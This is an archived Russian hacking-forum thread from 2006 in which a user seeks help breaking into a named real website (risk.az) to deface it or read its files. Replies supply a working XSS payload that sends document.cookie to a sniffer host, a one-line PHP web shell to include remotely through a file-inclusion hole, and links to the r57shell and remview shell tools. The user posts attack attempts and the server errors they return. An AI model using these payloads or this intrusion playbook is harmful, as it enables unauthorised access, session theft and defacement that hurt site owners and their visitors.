PDA

Просмотр полной версии : На сайте есть дырки. Помогите пожалуйста мне в дальнейшем


Cnekmp
19.02.2006, 20:28
Нашел уязвимость. Выполняется JavaScript:

http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39



Потом просканил. Вот что мне выдал:

1) Серьезная уязвимость
Выполнение кода, взятого с удаленного сервера

Описание

Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting/index.php?pg=http://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

2) Уязвимость
Реальный путь к серверу

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/interesting/index.php?pg=http://wwwwwwww/

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/disks/index.php?pg=1'

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/audio/index.php?pg=1'

3) Доступна информация
Ссылки с параметрами
Описание

Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/interesting/index.php?pg=multios

/archive/index.php?pg=010402

/disks/index.php?pg=SeaMed

/audio/index.php?pg=Aopen

4) Доступна информация
Доступ к директориям
Описание

Доступные директории:
/admin/
/communications/
/proccesors/
/boards/
/video/
/disks/
/audio/
/security/
/interesting/
/archive/

5) Недоступные директории
Описание

Cуществующие, но недоступные директории:
/cgi-bin/
/forum/
/mp3/
/search/
/tmp/
/includes/
/img/


Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам?

tclover
19.02.2006, 20:30
А ты пробовал зайти в доступную admin/?

Cnekmp
19.02.2006, 20:45
А ты пробовал зайти в доступную admin/?


Да, доступ туда есть, там написано:

Администратор форума


Логин:
Пароль:



Тока не говори мне что Брутить надо что-то :)
мне сказали залить PHP шелл со своево сервака, но я не знаю как это сделать...

Utochka
19.02.2006, 20:52
Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting...ttp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье.

Evolution
19.02.2006, 21:43
Нашел уязвимость. Выполняется JavaScript:
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)

Cnekmp
20.02.2006, 00:10
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>

и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)


1) Сниффер молчит....
Вот ответ на заливку сниффера:

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

2) А как Шелл делать?

Evolution
20.02.2006, 00:19
1) Сниффер молчит....
Вот ответ на заливку сниффера:

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

2) А как Шелл делать?
снифер не надо ни куда заливать! ты должен дать ссылку(<script src="http://adressnifera"+document.cookie;></script>) и куки должны прити на твой снифер.
а шел мона просто скачать от сюда (http://rst.void.ru/download/r57shell.txt)
а вообще не поленись зайти на яндекс/гугл и поискать что же такое шел и что делают со снифером!

k1b0rg
20.02.2006, 00:20
<?
system($cmd);
?>

сохрани как shell.php и залей на народ


судя по твоим данным сцылка будет такого вида http://www.site.com:443/interesting/index.php?cmd=ls&pg=http://site.narod.ru/shell

Electro
20.02.2006, 00:47
2Сnекmp

Юзай и это ...тоже полезная штука для твоего случия ))

http://antichat.ru/soft/remview.zip

Cnekmp
20.02.2006, 09:20
Попробовал все что вы сказали, через народ залить....
Может JavaScript-ом попробововать???

Вот ответ:

Warning: main(../interesting/info/http://cnekmp2005.narod.ru/remview.php.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/http://cnekmp2005.narod.ru/remview.php.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39

Cnekmp
20.02.2006, 09:26
Вот ссылка, сами проверьте , тока пожалуйста не ломайте :) Мне это для научных исследований нужен :)

http://www.risk.az:443/interesting/index.php?pg=1

Cnekmp
20.02.2006, 10:03
Нашел ещё один уязвимость, только на форуме:

http://www.risk.az:443/cgi-bin/forum/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS')><%252FIFRAME>


Что можно сделать в дальнейшем?

Cnekmp
20.02.2006, 16:58
Самое главное надо получить доступ на чтение файлов на серваке. Помогите мне пожалуйсто